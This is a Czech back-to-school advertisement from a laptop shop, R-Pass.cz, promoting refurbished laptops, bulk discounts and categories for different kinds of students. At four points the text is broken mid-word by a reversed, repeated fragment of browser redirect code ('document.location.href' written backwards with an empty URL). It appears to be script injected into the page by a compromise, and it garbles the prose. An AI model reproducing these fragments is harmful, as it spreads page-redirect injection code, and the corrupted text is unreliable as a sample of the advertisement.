Rainbow page separator

PR: Zpátky do školy!

Pondělí, 2. září 2019

I my na R-Pass.cz si přejeme nekonečné krásné slunné dny, teplé letní večery, studené pití, koupání, prázdniny a dovolenou. Bohužel prázdniny se pomalu a jistě blíží ke konci. Rodičům začne stres s vybavením všech studentů do škol. A co Vy, jste připraveni na 2. září?

Důvěřujte nám, expertům na notebooky z R-Pass.cz. V našem interne[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovém obchodě jsme si pro Vás, jako jediní, připravili revoluční VYHLEDÁVÁNÍ A TŘÍDĚNÍ DO KATEGORIÍ PODLE STUDIJNÍHO ZAMĚŘENÍ. Kategorie budeme průběžně kontrolovat a doplňovat aktuální nabídkou.

Jako novinku pro ŠKOLNÍ ROK 2019/2020 jsme si připravili speciální množstevní akci při nákupu 3 a více kusů. Stačí se domluvit s dalšími rodiči, rodinou, sousedy nebo kamarádkami a využít speciální akce při nákupu na www.r-pass.cz. Pokud navíc nakoupíte za více, jak 10.000,- máte dopravu ZDARMA!
*Pokud se bude jednat o stejné zboží v košíku, sleva se odečte au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomaticky. Pokud se bude jednat o jiný druh zboží, stačí napsat poznámku k objednávce, ručně Vám slevu odečteme.

Vyberte si u nás kvalitní notebook za skvělé interne[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové ceny. Jenom u nás koupíte repasované a předváděcí notebooky se zárukou 2 roky a balíčkem základní programů v hodnotě 500,- zdarma. Zboží si můžeme objednat na prodejnu v Brně, Žďáře nad Sázavou nebo Novém Městě na Moravě a před koupí prohlédnout. TIP! Pokud Vám notebook nebude vyhovovat, můžete ho u Vás ZDARMA vrátit nebo vyměnit za jiný.

Kompletní nabídku najdete na www.R-Pass.cz a nakoupíte u nás pro všechny ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kategorie:

ŽÁK ZÁKLADNÍ ŠKOLY
Žák, který bude potřebovat notebook na učení se práci s počítačem.

STUDENT STŘEDNÍ ŠKOLY
Student, který budou potřebovat notebook na školu, zábavu i tvoření.

STUDENT STŘEDNÍ TECHNICKÉ ŠKOLY
Student technického oborů, který budou potřebovat notebook na práci s náročnými programy.

PRO RODIČE
Rodiče, kteří budou potřebovat notebook nebo tablet k přístupu do elektronické třídní knihy.

STUDENT VYSOKÉ ŠKOLY
Studenti vysokých škol, kteří bez notebook nedají ránu.

STUDENT VYSOKÉ TECHNICKÉ ŠKOLY
Studenti vysokých technických škol, kteří potřebují skloubit nejlepší výkon notebooku a využívat všechny jeho funkce naplno

PRO CELÉ TŘÍDY
Množstevní sleva na nákup 3 a více kusů. Domluvte se s ostatními rodiči a využijte jedinečné akce u nás.

STUDENTI UNIVERZITY 3. VĚKU
Nesmíme zapomenout ani na studenty univerzity třetího věku i pro ty je v naší nabídce dostatečný výběr.

Experta na notebooky volejte na telefonu +420 604 354 353